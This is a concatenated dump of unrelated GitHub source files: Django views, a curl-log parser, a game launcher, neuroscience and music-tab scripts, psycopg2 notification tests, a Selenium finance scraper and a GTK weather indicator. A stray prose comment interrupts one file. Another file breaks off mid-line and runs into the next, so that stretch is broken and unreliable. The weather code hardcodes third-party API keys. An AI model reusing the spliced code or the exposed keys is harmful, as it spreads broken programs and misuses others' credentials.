status=status.HTTP_400_BAD_REQUEST\n                )\n            requests_filtered = all_requests.filter(organization=org)\n\n        if request_status is not None:\n            # validate that the status is either \"active\" or \"inactive\"\n            if request_status not in [\"active\", \"inactive\"]:\n                return Response(\n                    {\"message\": \"Invalid status parameter value\"},\n                    status=status.HTTP_400_BAD_REQUEST\n                )\n            if request_status == \"active\":\n                requests_filtered = requests_filtered.exclude(deactivation_time__lte=datetime.now(tz=timezone.utc))\n            elif request_status == \"inactive\":\n                requests_filtered = requests_filtered.filter(deactivation_time__lte=datetime.now(tz=timezone.utc))\n\n        # if the query set is empty\n        if not requests_filtered:\n            return Response(status=status.HTTP_204_NO_CONTENT)\n\n        serializer = RequestSerializer(requests_filtered, many=True)\n        return Response(\n            {\"requests\": serializer.data},\n            status=status.HTTP_200_OK\n        )\n    def post(self, request, format=None):\n        serializer = 
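The active/inactive branch is duplicated verbatim between DonationView and RequestView; both could call one shared helper. A refactoring sketch (the helper name is mine, not part of the project):

from datetime import datetime
from django.utils import timezone

def filter_by_status(queryset, status_value):
    # "active" = deactivation_time unset or still in the future;
    # "inactive" = already deactivated. Mirrors the branches in both views.
    now = datetime.now(tz=timezone.utc)
    if status_value == "active":
        return queryset.exclude(deactivation_time__lte=now)
    return queryset.filter(deactivation_time__lte=now)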
RequestSerializer(data=request.data)\n        if serializer.is_valid():\n            created_request = serializer.save()\n            return Response(\n                {\"request_id\": created_request.request_id},\n                status=status.HTTP_201_CREATED)\n        errors = serializer.errors\n        key = list(errors.keys())[0]\n        return Response(\n            {\"message\": \"for key \" + key + \" \" + str(errors[key])},\n            status=status.HTTP_400_BAD_REQUEST)\n\n    def delete(self, request, format=None):\n        request_id = request.data.get('request_id', None)\n        if request_id is not None:\n            try:\n                request_obj = Request.objects.get(request_id=request_id)\n            except (Request.DoesNotExist, ValueError):\n                return Response(\n                    {\"message\": \"Invalid request_id parameter value\"},\n                    status=status.HTTP_400_BAD_REQUEST\n                )\n            serializer = RequestSerializer(request_obj)\n            # soft_delete will be triggered in save()\n            serializer.save()\n            return Response(status=status.HTTP_200_OK)\n        return Response(\n            {\"message\": \"Invalid request\"},\n            status=status.HTTP_400_BAD_REQUEST\n        )\n\n","repo_name":"feed-our-communities/atfoc-backend","sub_path":"listing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29063699625","text":"import types\n\nimport ply.yacc as yacc\n\nfrom lexer import CurlOutputLexer\n\n\nclass Event(object):\n    __slots__ = ('datetime', 'event', 'data')\n\n    def __init__(self, datetime_obj, event, data=None):\n        self.datetime = datetime_obj\n        self.event = event\n        self.data = data\n\n    def __unicode__(self):\n        if self.data is not None:\n            if isinstance(self.data, types.ListType):\n                if len(self.data) > 3:\n                    data_repr = self.data[:3] + ['...']\n                else:\n                    data_repr = self.data\n            else:\n                data_repr = self.data\n            return \"Event {datetime=%s, event=%s, data=%s}\" % \\\n                (self.datetime, self.event, data_repr)\n        else:\n            return \"Event {datetime=%s, event=%s}\" % (self.datetime, self.event)\n\n    def __repr__(self):\n        return unicode(self)\n\n\nclass CurlOutputParser(object):\n    tokens = CurlOutputLexer.tokens\n\n    @classmethod\n    def p_log_data_more(cls, p):\n        'log_data : log_datum log_data'\n        p[0] = [p[1]] + p[2]\n\n    @classmethod\n    def p_log_data_finished(cls, p):\n        'log_data : '\n        p[0] = []\n\n    @classmethod\n    def p_log_datum_connecting(cls, p):\n        'log_datum : TIMESTAMP CONNECTING'\n        p[0] = Event(datetime_obj=p[1], event=\"connecting\", data=p[2])\n\n    @classmethod\n    def p_log_datum_connecting_ip(cls, p):\n        'log_datum : TIMESTAMP CONNECTING_IP'\n        p[0] = Event(datetime_obj=p[1], event=\"connecting_ip\", data=p[2])\n\n    @classmethod\n    def p_log_datum_connected_hostname_ip_port(cls, p):\n        'log_datum : TIMESTAMP CONNECTED_HOSTNAME_IP_PORT'\n        p[0] = Event(datetime_obj=p[1], event=\"connected_hostname_ip_port\", data=p[2])\n\n    @classmethod\n    def p_log_datum_closing_connection(cls, p):\n        'log_datum : TIMESTAMP CLOSING_CONNECTION'\n        p[0] = Event(datetime_obj=p[1], event=\"closing_connection\")\n\n    @classmethod\n    def p_log_datum_send_header(cls, p):\n        'log_datum : TIMESTAMP SEND_HEADER data'\n        p[0] = Event(datetime_obj=p[1], event='send_header', data=p[3])\n\n    @classmethod\n    def p_log_datum_recv_header(cls, p):\n        'log_datum : TIMESTAMP RECV_HEADER data'\n        p[0] = Event(datetime_obj=p[1], event='recv_header', data=p[3])\n\n    @classmethod\n    def p_log_datum_redirect(cls, p):\n        'log_datum : TIMESTAMP REDIRECT'\n        p[0] = Event(datetime_obj=p[1], event='redirect', data=p[2])\n\n    @classmethod\n    def p_log_datum_ssl_client_hello(cls, p):\n        'log_datum : TIMESTAMP SSL_CLIENT_HELLO'\n        p[0] = 
Event(datetime_obj=p[1], event=\"ssl_client_hello\")\n\n @classmethod\n def p_log_datum_ssl_server_hello(cls, p):\n 'log_datum : TIMESTAMP SSL_SERVER_HELLO'\n p[0] = Event(datetime_obj=p[1], event=\"ssl_server_hello\")\n\n @classmethod\n def p_log_datum_ssl_finished(cls, p):\n 'log_datum : TIMESTAMP SSL_FINISHED'\n p[0] = Event(datetime_obj=p[1], event=\"ssl_finished\")\n\n @classmethod\n def p_log_datum(cls, p):\n 'log_datum : TIMESTAMP'\n\n # Return None; this will still be present in the parse output but\n # we exclude it when returning to the caller.\n pass\n\n @classmethod\n def p_data_more(cls, p):\n 'data : data DATA'\n p[0] = p[1] + [p[2]]\n\n @classmethod\n def p_data_finished(cls, p):\n 'data : '\n p[0] = []\n\n @classmethod\n def p_error(cls, p):\n \"\"\"On an error restart the parser at the next timestamp.\n\n We can't predict everything that curl may print out, but at least\n with trace mode we know that lines will be prepended by timestamps.\"\"\"\n while True:\n token = yacc.token()\n if not token or token.type == \"TIMESTAMP\":\n break\n yacc.errok()\n return token\n\n @classmethod\n def build(cls):\n parser = yacc.yacc(module=cls)\n return parser\n\n @classmethod\n def parse(parser_cls, text, lexer_cls=CurlOutputLexer):\n lexer = lexer_cls.build()\n parser = parser_cls.build()\n parse = [elem for elem in parser.parse(text, lexer) if elem is not None]\n parse = parser_cls.collapse_recv_headers(parse)\n return parse\n\n @classmethod\n def collapse_recv_headers(cls, parse):\n \"\"\"Collapse multiple RECV_HEADER events into one event, with the datetime\n set to when the first header was received.datetime\n\n I couldn't figure out how to come up with a grammar without shift/reduce\n conflicts to do this, so we do it here.\"\"\"\n \n output = []\n in_block = False\n current_block = []\n for elem in parse:\n if elem.event != 'recv_header':\n if in_block:\n all_data = [block_elem.data[0] for block_elem in current_block]\n new_event = Event(datetime_obj=current_block[0].datetime,\n event=\"recv_header\",\n data=all_data)\n output.append(new_event)\n current_block = []\n in_block = False\n output.append(elem)\n continue\n in_block = True\n current_block.append(elem)\n return output\n","repo_name":"asimihsan/webopticon","sub_path":"src/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":5292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30879785949","text":"from ursina import *\r\ndef v100():\r\n application.development_mode = False\r\n game100 = Ursina()\r\n window.exit_button.enabled = False\r\n window.cog_button.enabled = False\r\n window.fps_counter.enabled = False\r\n window.borderless = False\r\n window.fullscreen = True\r\n game100.run()\r\ndef launcher():\r\n #try:\r\n import os\r\n import ctypes\r\n from zipfile import ZipFile\r\n os.system('cls')\r\n ctypes.windll.kernel32.SetConsoleTitleW(\"ExCraft\")\r\n print(\"ExCraft Launcher 1.0.0\\nVeress Bence Gyula - 2021\\n\")\r\n exdir = \"C:\\Ex\"\r\n appdir = \"C:\\Ex\\ExCraft\"\r\n verdir = \"C:\\Ex\\ExCraft\\\\1.0.0\"\r\n datadir = \"C:\\Ex\\ExCraft\\\\1.0.0\\data\"\r\n if not os.path.exists(exdir):\r\n os.mkdir(exdir)\r\n print(\"Directory created: \" + exdir)\r\n if not os.path.exists(appdir):\r\n os.mkdir(appdir)\r\n print(\"Directory created: \" + appdir)\r\n if not os.path.exists(verdir):\r\n os.mkdir(verdir)\r\n print(\"Directory created: \" + verdir)\r\n if not os.path.exists(datadir):\r\n os.mkdir(datadir)\r\n print(\"Directory 
created: \" + datadir)\r\n if not (os.path.exists(\"C:\\Ex\\ExCraft\\\\1.0.0\\data\\data.excraft\")):\r\n usernamef = open(\"C:\\Ex\\ExCraft\\\\1.0.0\\data\\data.excraft\",\"w\")\r\n usernamei = input(\"\\nEnter a username: \")\r\n usernamef.write(usernamei)\r\n usernamef.close()\r\n print(\"\\nExCraft setup completed!\\nPress any key to restart ExCraft!\")\r\n input()\r\n launcher()\r\n usernamef = open(\"C:\\Ex\\ExCraft\\\\1.0.0\\data\\data.excraft\",\"r\")\r\n linec = 0\r\n for line in usernamef:\r\n linec += 1\r\n if (linec == 1):\r\n username = line\r\n try:\r\n print(\"Welcome \" + username + \"!\")\r\n except UnboundLocalError:\r\n username = \"Player\"\r\n print(\"Welcome \" + username + \"!\")\r\n print(\"Available versions:\\n\")\r\n print(\" 1.0.0 - 2021.11.27\")\r\n print(\"\\nType which version do you want to play!\")\r\n verselect = input(\"Selection: \")\r\n if (verselect == \"1.0.0\"):\r\n v100()\r\n else:\r\n print(\"Invalid version!\\nPress any key to retry!\")\r\n input()\r\n launcher()\r\n #except:\r\n #print(\"\\nPY: ERROR\\nPress any key to continue!\")\r\n #input()\r\nlauncher()","repo_name":"VBence2008/Discontinued","sub_path":"ExCraft/1.0.0/ExCraft.py","file_name":"ExCraft.py","file_ext":"py","file_size_in_byte":2452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28624215660","text":"import pickle\nimport os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom matplotlib.mlab import PCA\nfrom scipy.spatial import distance\nimport scipy.cluster.hierarchy as sch\nfrom scipy.spatial.distance import squareform\nimport seaborn as sns\nfrom scipy.signal import correlate,correlate2d\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom mpl_toolkits.mplot3d import proj3d\nfrom sklearn import manifold\nfrom sklearn.metrics import euclidean_distances\n# from sklearn.decomposition import PCA\nfrom scipy.stats import zscore\nfrom moran_lab.band_pass_filters import savitzky_golay\n\ndef calc_batch_times(taste_events):\n diffs = taste_events[1:] - taste_events[:-1]\n change_locs = np.array(np.where(diffs > 300)) + 1\n return taste_events[change_locs[0]]\n\ndef split_event_times_by_batches(event_times, batch_times):\n mat = []\n previous = 0\n for current in batch_times:\n this_batch_times = [i for i in event_times if previous < i < current]\n mat.append(this_batch_times)\n previous = current\n last_batch = [i for i in event_times if previous < i]\n mat.append(last_batch)\n return mat\n\ndef get_spikes_in_time_frame(ST,start,stop):\n return np.array([i for i in ST if start0:\n lyric_search=\"Lyrics[no='%d']\" % loop\n chord_lyric=self.getvalue(chord,lyric_search+\"/text\")\n if not(chord_lyric is None):\n syllabic=self.getvalue(chord,lyric_search+\"/syllabic\")\n sep = \"-\" if (syllabic==\"begin\" or syllabic==\"middle\") else \" \"\n lyrics=self.addLyric(mystaff,lyrics,chord_lyric,sep)\n for i in range(len(mychord)):\n mystaff[i]+=mychord[i]\n self.fixLength(mystaff,lyrics)\n \n if len(mystaff[0])+len(self.output_staff[0])>=110: self.dumpstaff()\n self.addMeasure(mystaff,lyrics)\n rpt=measure.find(\"endRepeat\")\n if not(rpt is None):\n rptcount=int(rpt.text)\n if (loop80:\n self.addln(chords)\n self.addln(lyrics)\n lyrics=\"\"\n chords=\"\"\n self.addln(chords)\n self.addln(lyrics)\n \n\n def getStaffName(self,staff):\n id=staff.attrib['id']\n #track=self.root.find('./Score/Part[Staff[@id=\"'+id+'\"]]/trackName')\n track=self.root.find('./Score/Part/Staff[@id=\"'+id+'\"]/../trackName')\n 
name=id+\" \"+track.text if not(track is None) else str(id)\n        return name\n\n    def getChordName(self,harmony):\n        croot=self.getvalue(harmony,\"root\")\n        cname=self.getvalue(harmony,\"name\")\n        if cname is None: cname=\"\"\n        if croot is None:\n            return \"\"\n        else:\n            chordnames={8:\"Gb\",9:\"Db\",10:\"Ab\",11:\"Eb\",12:\"Bb\",13:\"F\",14:\"C\",15:\"G\",16:\"D\",17:\"A\",18:\"E\",19:\"B\",20:\"F#\",21:\"C#\",22:\"G#\"}\n            nroot=int(croot)\n            if nroot in chordnames:\n                croot=chordnames[nroot]\n            return croot+cname\n    \n    def dumpstaff(self):\n        strings = ['A','E','C','G']\n        for i in range(len(self.output_staff)):\n            self.addln(strings[i]+self.output_staff[i]+\"|\")\n            self.output_staff[i]=\"\"\n        if len(self.output_lyrics)>0:\n            self.addln(\" \"+self.output_lyrics)\n        self.output_lyrics=\"\"\n        self.addln()\n    \n    def fillnote(self,value,duration):\n        ln=max((self.calclength(duration)-self.minlen)+1,1)\n        result=value\n        while len(result)=X:\n                count+=1\n            else:\n                break\n        if count==M:\n            flag=True\n            before_price=min(price, before_price)\nif flag==False:\n    print(-1)\nelse:\n    print(before_price)\n\n\n\n","repo_name":"umzw/AtCoder","sub_path":"167 C- Skill Up.py","file_name":"167 C- Skill Up.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"811988145","text":"# A, B, and C are three sides of a triangle\n\n# s = (A + B + C) / 2\n\n# area = √(s*(s-a)*(s-b)*(s-c))\n\n# to find the area of the triangle\n# a = 5\n# b = 3\n# c = 5\n\n# Take inputs from the user\na = float(input(\"Enter first side: \"))\nb = float(input(\"Enter second side: \"))\nc = float(input(\"Enter third side: \"))\n\n\n# calculate the semi-perimeter\ns = (a + b + c) / 2\n\n# calculate the area of the triangle\narea = (s*(s-a)*(s-b)*(s-c)) ** 0.5\n\nprint(f'The area of the triangle is {area}')\n","repo_name":"Nikhil235/Python","sub_path":"Intoduction/area_of_triangle.py","file_name":"area_of_triangle.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5562323702","text":"# coding=utf-8\n# encoding=utf-8\nfrom pymongo import MongoClient\n\n\nclass DataPersistence(object):\n    conn = MongoClient('localhost', 27017)\n    db = conn.law\n    collection = db.law1\n\n    def save(self, dic):\n        try:\n            self.collection.save(dic)\n            print ('Data inserted successfully')\n        except Exception as e:\n            print (e)\n\n    def search(self):\n        try:\n            result = self.collection.find()\n            print (result)\n        except Exception as e:\n            print(e)","repo_name":"mayJJ/lawyer","sub_path":"DataPersistence.py","file_name":"DataPersistence.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37168551271","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.io\nimport pickle\n\nmat = scipy.io.loadmat('mnist_small.mat')\n\nK = 2\nD = 784\nN = 10000\n\nX = mat['X'] #N*D matrix\nZ = np.random.rand(N,K) #N*K matrix,initialize with random values\nW = np.zeros((D,K)) #D*K matrix\nprint(X.shape)\nprint(Z.shape)\nprint(W.shape)\n\nnum_iterations = 0\nwhile(num_iterations<500):\n\tW = (np.dot(np.linalg.inv(np.dot(Z.T,Z)),np.dot(Z.T,X))).T\n\tZ = np.dot(np.dot(X,W),np.linalg.inv(np.dot(W.T,W)))\n\tnum_iterations += 1\n\n\nf = open(b\"embeddings_pca.obj\",\"wb\")\npickle.dump(Z,f)\n","repo_name":"aman9875/cs771","sub_path":"assignment 
4/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":557,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"23689292142","text":"from libcloud.storage.types import Provider\nfrom libcloud.storage.providers import get_driver\n\nFILE_PATH = \"/home/user/myfile.tar.gz\"\n\ncls = get_driver(Provider.SCALEWAY)\n\ndriver = cls(\"api key\", \"api secret key\", region=\"fr-par\")\n\ncontainer = driver.get_container(container_name=\"\")\n\nextra = {\n \"meta_data\": {\"owner\": \"myuser\", \"created\": \"2001-05-25\"},\n \"acl\": \"public-read\",\n}\n\nwith open(FILE_PATH, \"rb\") as iterator:\n obj = driver.upload_object_via_stream(\n iterator=iterator, container=container, object_name=\"backup.tar.gz\", extra=extra\n )\n","repo_name":"apache/libcloud","sub_path":"docs/examples/storage/scaleway/upload_example.py","file_name":"upload_example.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"71779199787","text":"#!/usr/bin/env python\nimport unittest\nimport warnings\n\nimport psycopg2\nfrom psycopg2 import extensions\n\nimport time\nimport select\nimport signal\nfrom subprocess import Popen, PIPE\n\nimport sys\nif sys.version_info < (3,):\n import tests\nelse:\n import py3tests as tests\n\n\nclass NotifiesTests(unittest.TestCase):\n\n def setUp(self):\n self.conn = psycopg2.connect(tests.dsn)\n\n def tearDown(self):\n self.conn.close()\n\n def autocommit(self, conn):\n \"\"\"Set a connection in autocommit mode.\"\"\"\n conn.set_isolation_level(extensions.ISOLATION_LEVEL_AUTOCOMMIT)\n\n def listen(self, name):\n \"\"\"Start listening for a name on self.conn.\"\"\"\n curs = self.conn.cursor()\n curs.execute(\"LISTEN \" + name)\n curs.close()\n\n def notify(self, name, sec=0, payload=None):\n \"\"\"Send a notification to the database, eventually after some time.\"\"\"\n if payload is None:\n payload = ''\n else:\n payload = \", %r\" % payload\n\n script = (\"\"\"\\\nimport time\ntime.sleep(%(sec)s)\nimport psycopg2\nimport psycopg2.extensions\nconn = psycopg2.connect(%(dsn)r)\nconn.set_isolation_level(psycopg2.extensions.ISOLATION_LEVEL_AUTOCOMMIT)\nprint conn.get_backend_pid()\ncurs = conn.cursor()\ncurs.execute(\"NOTIFY \" %(name)r %(payload)r)\ncurs.close()\nconn.close()\n\"\"\"\n % { 'dsn': tests.dsn, 'sec': sec, 'name': name, 'payload': payload})\n\n return Popen([sys.executable, '-c', script], stdout=PIPE)\n\n def test_notifies_received_on_poll(self):\n self.autocommit(self.conn)\n self.listen('foo')\n\n proc = self.notify('foo', 1)\n\n t0 = time.time()\n ready = select.select([self.conn], [], [], 5)\n t1 = time.time()\n self.assert_(0.99 < t1 - t0 < 4, t1 - t0)\n\n pid = int(proc.communicate()[0])\n self.assertEqual(0, len(self.conn.notifies))\n self.assertEqual(extensions.POLL_OK, self.conn.poll())\n self.assertEqual(1, len(self.conn.notifies))\n self.assertEqual(pid, self.conn.notifies[0][0])\n self.assertEqual('foo', self.conn.notifies[0][1])\n\n def test_many_notifies(self):\n self.autocommit(self.conn)\n for name in ['foo', 'bar', 'baz']:\n self.listen(name)\n\n pids = {}\n for name in ['foo', 'bar', 'baz', 'qux']:\n pids[name] = int(self.notify(name).communicate()[0])\n\n self.assertEqual(0, len(self.conn.notifies))\n self.assertEqual(extensions.POLL_OK, self.conn.poll())\n self.assertEqual(3, len(self.conn.notifies))\n\n names = dict.fromkeys(['foo', 'bar', 'baz'])\n for (pid, name) in self.conn.notifies:\n 
self.assertEqual(pids[name], pid)\n names.pop(name) # raise if name found twice\n\n def test_notifies_received_on_execute(self):\n self.autocommit(self.conn)\n self.listen('foo')\n pid = int(self.notify('foo').communicate()[0])\n self.assertEqual(0, len(self.conn.notifies))\n self.conn.cursor().execute('select 1;')\n self.assertEqual(1, len(self.conn.notifies))\n self.assertEqual(pid, self.conn.notifies[0][0])\n self.assertEqual('foo', self.conn.notifies[0][1])\n\n def test_notify_object(self):\n self.autocommit(self.conn)\n self.listen('foo')\n self.notify('foo').communicate()\n self.conn.poll()\n notify = self.conn.notifies[0]\n self.assert_(isinstance(notify, psycopg2.extensions.Notify))\n\n def test_notify_attributes(self):\n self.autocommit(self.conn)\n self.listen('foo')\n pid = int(self.notify('foo').communicate()[0])\n self.conn.poll()\n self.assertEqual(1, len(self.conn.notifies))\n notify = self.conn.notifies[0]\n self.assertEqual(pid, notify.pid)\n self.assertEqual('foo', notify.channel)\n self.assertEqual('', notify.payload)\n\n def test_notify_payload(self):\n if self.conn.server_version < 90000:\n warnings.warn(\"server version %s doesn't support notify payload: skipping test\"\n % self.conn.server_version)\n return\n self.autocommit(self.conn)\n self.listen('foo')\n pid = int(self.notify('foo', payload=\"Hello, world!\").communicate()[0])\n self.conn.poll()\n self.assertEqual(1, len(self.conn.notifies))\n notify = self.conn.notifies[0]\n self.assertEqual(pid, notify.pid)\n self.assertEqual('foo', notify.channel)\n self.assertEqual('Hello, world!', notify.payload)\n\n def test_notify_init(self):\n n = psycopg2.extensions.Notify(10, 'foo')\n self.assertEqual(10, n.pid)\n self.assertEqual('foo', n.channel)\n self.assertEqual('', n.payload)\n (pid, channel) = n\n self.assertEqual((pid, channel), (10, 'foo'))\n\n n = psycopg2.extensions.Notify(42, 'bar', 'baz')\n self.assertEqual(42, n.pid)\n self.assertEqual('bar', n.channel)\n self.assertEqual('baz', n.payload)\n (pid, channel) = n\n self.assertEqual((pid, channel), (42, 'bar'))\n\n def test_compare(self):\n data = [(10, 'foo'), (20, 'foo'), (10, 'foo', 'bar'), (10, 'foo', 'baz')]\n for d1 in data:\n for d2 in data:\n n1 = psycopg2.extensions.Notify(*d1)\n n2 = psycopg2.extensions.Notify(*d2)\n self.assertEqual((n1 == n2), (d1 == d2))\n self.assertEqual((n1 != n2), (d1 != d2))\n\n def test_compare_tuple(self):\n from psycopg2.extensions import Notify\n self.assertEqual((10, 'foo'), Notify(10, 'foo'))\n self.assertEqual((10, 'foo'), Notify(10, 'foo', 'bar'))\n self.assertNotEqual((10, 'foo'), Notify(20, 'foo'))\n self.assertNotEqual((10, 'foo'), Notify(10, 'bar'))\n\n def test_hash(self):\n from psycopg2.extensions import Notify\n self.assertEqual(hash((10, 'foo')), hash(Notify(10, 'foo')))\n self.assertNotEqual(hash(Notify(10, 'foo', 'bar')),\n hash(Notify(10, 'foo')))\n\ndef test_suite():\n return unittest.TestLoader().loadTestsFromName(__name__)\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","repo_name":"Ademan/psycopg2","sub_path":"tests/test_notify.py","file_name":"test_notify.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"20956359739","text":"import re\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options\nfrom time import sleep\nimport pandas as pd\nimport datetime\n\n# epoch timestamp: 1483228800\nstart_from = datetime.datetime(2017,1,1,8,0,0).strftime('%s') \n\ngafata = 
['^GSPC', 'GOOG', 'AAPL', 'FB', 'AMZN', '0700.HK', 'BABA']\nsource_data_path = \"/Users/data/\"\n\nchrome_options = Options()\nchrome_options.add_argument('--headless')\nchrome_options.add_argument('--disable-gpu')\n# Set the download directory\nprefs = {'profile.default_content_settings.popups': 0, 'download.default_directory': f'{source_data_path}'}\nchrome_options.add_experimental_option('prefs', prefs)\n\ndriver = webdriver.Chrome('/Users/hantao/Documents/践行群内容/extract-python/chromedriver', options = chrome_options)\n\ndriver = webdriver.Chrome('/usr/local/bin/chromedriver', options = chrome_options)\n\n# get all csv files\ndriver.get(f'https://finance.yahoo.com/quote/{gafata[0]}/history')\nsleep(5)\n\ndownload_link = driver.find_element_by_xpath(\"// a[. // span[text() = 'Download Data']]\").get_attribute(\"href\")\nfor symbol in gafata:\n    period1_changed = re.sub(r'period1=(\\d+)', 'period1=1483228800', download_link)\n    # if interval=1d, then stocks from various global exchanges would not align to each other in terms of date.\n    interval_changed = re.sub(r'interval=(.*)&', 'interval=1wk&', period1_changed)\n    dataURL = re.sub(r'download\\/.*\\?', f'download/{symbol}?', interval_changed)\n    driver.get(dataURL)\n    # Sleep so the file has been generated before we parse it\n    sleep(5)\n\n","repo_name":"sodexx7/extract-histical-data-from-yahoo-finance","sub_path":"gafat_extract.py","file_name":"gafat_extract.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"12406598398","text":"import requests\n\ntmdb_api_key = \"8c0bf74f3e2ad8fde17e6070d4058723\"\nsearch_movie_url = \"https://api.themoviedb.org/3/search/movie\"\nmovie_image_url = \"https://image.tmdb.org/t/p/w500\"\n\n# params = {\n#     \"api_key\": tmdb_api_key,\n#     \"query\": \"phone booth\"\n# }\n#\n# response = requests.get(url=search_movie_url, params=params)\n# data = response.json()[\"results\"]\n# print(data)\n\n# for x in data:\n#     print(f\"{x['title']} - {x['release_date']}\")\n\n\nresponse = requests.get(url=\"https://api.themoviedb.org/3/movie/1817\", params={\"api_key\": tmdb_api_key})\ndata = response.json()\n# print(data)\n\nmovie = {\n    \"title\": data[\"title\"],\n    \"year\": data[\"release_date\"].split(\"-\")[0],\n    \"img_url\": movie_image_url + data[\"poster_path\"],\n    \"description\": data[\"overview\"]\n}\n\nprint(movie)\n\n\n\n\n","repo_name":"developer-aaronlee/flask-my-top10-movies","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"42507910905","text":"class User:\n    def __init__(self, name, id):\n        self.name = name\n        self.id = id\n        self.followers = 0\n        self.following = 0\n    \n    def follow(self, user):\n        user.followers += 1\n        self.following += 1\n\n\nuser1 =User(\"Param\", 1)\nuser2 =User(\"Anjali\", 2)\n\nprint(user1.name)\n\nprint(user1.followers)\nuser1.follow(user2)\nprint(user1.followers)","repo_name":"Paramvir12121/100-Days_of_Python-Beginner","sub_path":"day17_quiz/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":371,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41313488877","text":"#!/usr/bin/env python3\nimport signal\nimport os\nimport requests\nimport gi\ngi.require_version('Gtk', '3.0')\ngi.require_version('AppIndicator3', '0.1')\nfrom gi.repository import Gtk as gtk\nfrom gi.repository import AppIndicator3 as appindicator\nfrom gi.repository import GLib as 
glib\n\n\nAPPINDICATOR_ID = 'myappindicator'\nREPEAT_TIME_MS = 30000\nKELVINTOCELSIUS = 273.16\n\n\nclass WeatherIndicator:\n attributes_prefix = ['', 'Sky: ', 'Temperature: ', 'Pressure: ', 'Humidity: ', 'Wind Speed: ']\n\n def __init__(self, name=None, icon=None):\n self.path = os.path.abspath(os.path.dirname(__file__))\n\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n\n if name is None:\n self.name = \"WeatherIndicator\"\n else:\n self.name = name\n\n if icon is None:\n self.icon = gtk.STOCK_INFO\n else:\n self.icon = icon\n\n self.indicator = appindicator.Indicator.new(\n self.name, self.icon,\n appindicator.IndicatorCategory.SYSTEM_SERVICES\n )\n self.indicator.set_status(appindicator.IndicatorStatus.ACTIVE)\n\n weather_data, icon_path = self.get_weather_data_from_request()\n menu, menu_items_to_update = self.build_menu(weather_data)\n\n self.indicator.set_menu(menu)\n self.indicator.set_label(weather_data[2], \"\")\n self.indicator.set_icon(icon_path)\n\n glib.timeout_add(REPEAT_TIME_MS, self.update_indicator, menu_items_to_update)\n gtk.main()\n\n @staticmethod\n def get_ip_from_request():\n raw_json = requests.get('https://ifconfig.co/json').json()\n ip = raw_json['ip']\n return ip\n\n @staticmethod\n def get_location_from_request(ip_address):\n api_address = 'http://api.ipstack.com/'\n personal_api_key = '8810a19a176c8c056a47d73fdd70e70f'\n url = api_address + ip_address + '?access_key=' + personal_api_key\n raw_json_data = requests.get(url).json()\n country = raw_json_data['country_name']\n city = raw_json_data['city']\n if city is None:\n city = raw_json_data['location']['capital']\n\n return city, country\n\n def get_weather_data_from_request(self):\n try:\n host_ip = self.get_ip_from_request()\n except:\n print(\"Unable to get ip from request\")\n\n city, country = self.get_location_from_request(host_ip)\n api_address = 'http://api.openweathermap.org/data/2.5/weather?appid=ca428a05cb62822c904d1abb2257ba16&q='\n url = api_address + city\n location = city + ', ' + country\n raw_data_from_api = requests.get(url).json()\n sky = raw_data_from_api['weather'][0]['main']\n temperature = round(raw_data_from_api['main']['temp'] - KELVINTOCELSIUS, 1)\n temperature = str(temperature) + ' °C'\n pressure = raw_data_from_api['main']['pressure']\n pressure = str(pressure) + ' hPa'\n humidity = raw_data_from_api['main']['humidity']\n humidity = str(humidity) + ' %'\n wind_speed = raw_data_from_api['wind']['speed']\n wind_speed = str(wind_speed) + ' m/s'\n icon_path = os.path.dirname(os.path.realpath(__file__)) + \"/icons/\" + raw_data_from_api['weather'][0][\n 'icon'] + \".png\"\n weather_data = [location, sky, temperature, pressure, humidity, wind_speed]\n return weather_data, icon_path\n\n def build_menu(self, attributes):\n menu = gtk.Menu()\n\n menu_items = []\n for i in range(0, len(attributes)):\n new_item = gtk.MenuItem(self.attributes_prefix[i] + attributes[i])\n menu.append(new_item)\n menu_items.append(new_item)\n\n item_quit = gtk.MenuItem('Quit')\n item_quit.connect('activate', quit)\n menu.append(item_quit)\n menu.show_all()\n\n return menu, menu_items\n\n def update_indicator(self, menu_items):\n try:\n weather_data, icon_path = self.get_weather_data_from_request()\n self.indicator.set_label(weather_data[2], \"\")\n self.indicator.set_icon(icon_path)\n for i in range(0, len(weather_data)):\n menu_items[i].set_label(self.attributes_prefix[i] + weather_data[i])\n\n print(weather_data[2])\n except:\n print(\"Weather not updated.\")\n\n return True\n\n\nif __name__ == 
